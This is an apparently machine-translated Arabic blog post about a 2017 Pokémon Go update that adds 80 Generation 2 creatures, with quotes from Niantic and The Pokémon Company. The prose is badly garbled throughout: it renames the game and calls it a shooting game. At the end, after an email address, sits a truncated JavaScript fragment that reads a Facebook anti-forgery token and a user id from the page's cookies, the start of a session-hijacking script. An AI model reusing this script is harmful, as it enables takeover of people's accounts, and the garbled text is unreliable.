vendredi 17 février 2017

بوكيمون الذهاب يحصل على 80 Gen 2 من الوحوش من الذهب والفضة في تحديث واسعة النطاق





لا شيء يمكن أن يبقى الذهب، Ponyboy ... حسنا، لا شيء الذهب (أو الفضة) يمكن ان يبقى بعيدا عن بوكيمون العودة، وهذا هو.

لعبة خرائط غوغل تعمل بالطاقة موقع صيد الوحش هو الحصول على 80 مخلوقات جديدة، كشفت المطور Niantic من مباشرة إلى GamesBeat. وهذا يعني أن اللاعبين مخصص سيكون لها الآن فرصة لالتقاط مبتدئين المنطقة Johto مثل Chikorita، Cyndaquil، Totodile تبدأ في وقت لاحق هذا الاسبوع. وخلافا للبوكيمون وأضاف سابقا، سوف لا يكون لديك ليفقس هؤلاء الوحوش من البيض. بدلا من ذلك، سوف تجد منهم في البرية عن طريق المشي حول منطقتكم وخارجها.

ما وراء بوكيمون جديد، Niantic من يضيف عددا من الميزات الجديدة الرئيسية الأخرى. وهنا ما يمكن أن تتوقعه:

هذه اللعبة لقاء جديد
البنود تطور جديدة
اثنين من التوت جديدة
المزيد من الأجهزة والملحقات
"اليوم هو مناسبة هامة لفريقنا هنا في Niantic من الذي كان من الصعب في العمل لتقديم هذه بوكيمون إضافية وبناء على لقاء والتقاط الميكانيكا لمجتمعنا العالمي عاطفي المدربين لعب بوكيمون العودة،" وجدت Niantic من والمدير التنفيذي وقال جون هانكه في بيان. "بوكيمون العودة هي تجربة حية أننا سوف تواصل دعم وتطوير في طرق جديدة ومثيرة للاهتمام لسنوات قادمة مع ميزات هذه اللعبة الجديدة، في اللعبة والفعاليات الحية، والمزيد من بوكيمون لاكتشاف، وأكثر من ذلك بكثير."

وهذا هو أكبر التحديث حتى الآن طريقة لبوكيمون العودة، الذي ظهر لأول مرة في فصل الصيف. وأثار ذلك إطلاق مروحة pandamonium، وانها ساعدت لعبة تبادل لاطلاق النار في الجزء العلوي من تحميل والرسوم البيانية على الاطلاق في صناعة المحمول الألعاب 36600000000 $. وتراجع المؤشر منذ العودة إلى الأرض، لكنه لا يزال بانتظام في أعلى 10 أعلى الايرادات تطبيقات على دائرة الرقابة الداخلية والروبوت. وانها ما يقرب من يضمن أن هذا التدفق الجديد للمحتوى - وخاصة مخلوقات جديدة - سوف تجدد اهتمام محبي والإنفاق.

"مع بوكيمون العودة، سعت الشركة بوكيمون لخلق لعبة مقنعة تستند إلى مفهوم تواجه واصطياد بوكيمون في العالم الحقيقي" وقال الشركة بوكيمون الدولية مدير التسويق الاستهلاكي J.C. سميث في بيان. "إن استجابة مذهلة لبوكيمون العودة الملايين من عشاق بوكيمون الحاليين والجدد في جميع أنحاء العالم لافت للنظر. ونحن مسرورون للحفاظ على مغامرة الذهاب بالترحيب هذه بوكيمون على هذه الطريقة الجديدة الجذابة التي تعاني من متعة العلامة التجارية بوكيمون ".

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...